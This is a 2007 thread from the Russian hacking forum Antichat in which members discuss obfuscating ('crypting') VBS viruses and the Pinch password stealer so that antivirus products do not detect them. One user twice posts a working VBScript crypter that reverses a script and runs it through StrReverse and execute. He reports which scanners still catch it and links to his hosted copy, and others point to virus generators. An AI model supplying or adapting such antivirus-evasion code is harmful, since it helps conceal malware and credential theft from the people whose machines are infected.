ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Безопасность > Защита ОС: вирусы, антивирусы, файрволы.
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 27.03.2007, 19:39
P1rat
Новичок
Регистрация: 27.03.2007
Сообщений: 26
Провел на форуме:
446935

Репутация: 23
По умолчанию

Цитата:
Сообщение от Slapy  
mm..... а че за вирус в фармате .vbs че он делает этот вирус ? блин кто поможет с хорошим криптором фармата .exe ? мне для Pincha =((((
http://forum.antichat.ru/thread35892.html
или
http://damagelab.org/index.php?showtopic=17244
 
Ответить с цитированием

  #12  
Старый 27.03.2007, 19:52
GROB_T
Участник форума
Регистрация: 03.03.2007
Сообщений: 135
Провел на форуме:
833374

Репутация: 124
По умолчанию

v1ru$, спасибо, что сказал, видимо, все зависит от самого вируса, когда я на вирустотале проверил вирус, сгенеренный на апокалипсисе со всеми настройками, результат был намного хуже чем у тебя, палил даже каспер
Вот обновление http://grob-t.narod.ru/Cryptor.vbs , тот же вирь на апокалипсисе определяют только BitDefender:VBS.Alien.B@mm и McAfee:NewScript, сегодня под вечер, а может и раньше немного изменю криптор, если кто заметил, то первый и второй криптор были совсем разные, короче попробую их скрестить, и кстати v1ru$ что ты такое криптовал у меня ни панда ни Ewido ни разу не вякнули

Slapy, vbs вирусы это обычные вирусы делают тоже-самое,что и обычные вирусы написаны на языке Visual Basic Script, если хочешь разобраться скачай какой-нибудь генератор vbs вирусов, их много, русский - apokalipses
 
Ответить с цитированием

  #13  
Старый 27.03.2007, 19:55
_Great_
Флудер
Регистрация: 27.12.2005
Сообщений: 2,372
Провел на форуме:
5339610

Репутация: 4360


Отправить сообщение для _Great_ с помощью ICQ
По умолчанию

Цитата:
Сообщение от Slapy  
не понел =((((( а как криптовать то Pinch ? =(((((
наверное стоит научиться отличать exe от vb
 
Ответить с цитированием

  #14  
Старый 29.03.2007, 12:28
GROB_T
Участник форума
Регистрация: 03.03.2007
Сообщений: 135
Провел на форуме:
833374

Репутация: 124
По умолчанию

Вот очередное обновление:
Set FSO = CreateObject("Scripting.FileSystemObject")
Set File = FSO.GetFile("C:\temp.vbs")'Тут нужно указать путь к файлу, который надо закриптовать
Set TextStream = File.OpenAsTextStream(1)
While Not TextStream.AtEndOfStream
Str = TextStream.ReadLine()
st=st&replace(str,"""","""""")
st=st&"""&flrcbv&"""
strr=StrReverse(st)
Wend
TextStream.Close
Set TextStream = FSO.CreateTextFile("C:\temp2.vbs")'Сюда будет сохраняться закриптованный файл
TextStream.Writeline "a=StrReverse("""&strr&""")"&vbcrlf&"execute(a )"
TextStream.Close

Правда от BitDefender не удалось скрыть , только от McAfee, а, кстати этот антивирь BitDefender, он популярный или нет?
 
Ответить с цитированием

  #15  
Старый 29.03.2007, 12:37
v1ru$
Постоянный
Регистрация: 17.03.2007
Сообщений: 336
Провел на форуме:
3766085

Репутация: 576
Отправить сообщение для v1ru$ с помощью ICQ
По умолчанию

Вроде бит не очень,но пинчи палит криптованые(если паблик криптор)
З.Ы.На вирустотале я проверял сам криптор)
 
Ответить с цитированием

  #16  
Старый 06.06.2007, 17:52
Dimi4
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме:
7617458

Репутация: 3965


Отправить сообщение для Dimi4 с помощью ICQ
По умолчанию

А можеж выложить конечный код (когда уже с формою).Интересно взглянуть.
П.С.Я просто практикуюсь на вб, и хотел бы знать как ты ето зделал.
 
Ответить с цитированием

  #17  
Старый 06.06.2007, 18:05
sakauri
Познающий
Регистрация: 23.05.2007
Сообщений: 43
Провел на форуме:
44898

Репутация: -2
По умолчанию

Вот блин каспер ворчит на хак тулл!!!
 
Ответить с цитированием

  #18  
Старый 06.06.2007, 18:09
GROB_T
Участник форума
Регистрация: 03.03.2007
Сообщений: 135
Провел на форуме:
833374

Репутация: 124
По умолчанию

Dimi4, это написано на VBS, хотя на vb тоже работать должно, формы помоему не надо
 
Ответить с цитированием

  #19  
Старый 08.06.2007, 12:05
Dimi4
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме:
7617458

Репутация: 3965


Отправить сообщение для Dimi4 с помощью ICQ
По умолчанию

Цитата:
Сообщение от GROB_T  
Dimi4, это написано на VBS, хотя на vb тоже работать должно, формы помоему не надо
Ето механическая ошибка, я имел ввиду vbs.Дай код плз, а то я парюсь с BrowseForFolder ничо не катит.

Последний раз редактировалось Dimi4; 08.06.2007 в 12:08..
 
Ответить с цитированием

  #20  
Старый 08.06.2007, 13:35
GROB_T
Участник форума
Регистрация: 03.03.2007
Сообщений: 135
Провел на форуме:
833374

Репутация: 124
По умолчанию

2 Dimi4, это и есть код

Set FSO = CreateObject("Scripting.FileSystemObject")
Set File = FSO.GetFile("C:\temp.vbs")'Тут нужно указать путь к файлу, который надо закриптовать
Set TextStream = File.OpenAsTextStream(1)
While Not TextStream.AtEndOfStream
Str = TextStream.ReadLine()
st=st&replace(str,"""","""""")
st=st&"""&flrcbv&"""
strr=StrReverse(st)
Wend
TextStream.Close
Set TextStream = FSO.CreateTextFile("C:\temp2.vbs")'Сюда будет сохраняться закриптованный файл
TextStream.Writeline "a=StrReverse("""&strr&""")"&vbcrlf&"execute(a )"
TextStream.Close
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ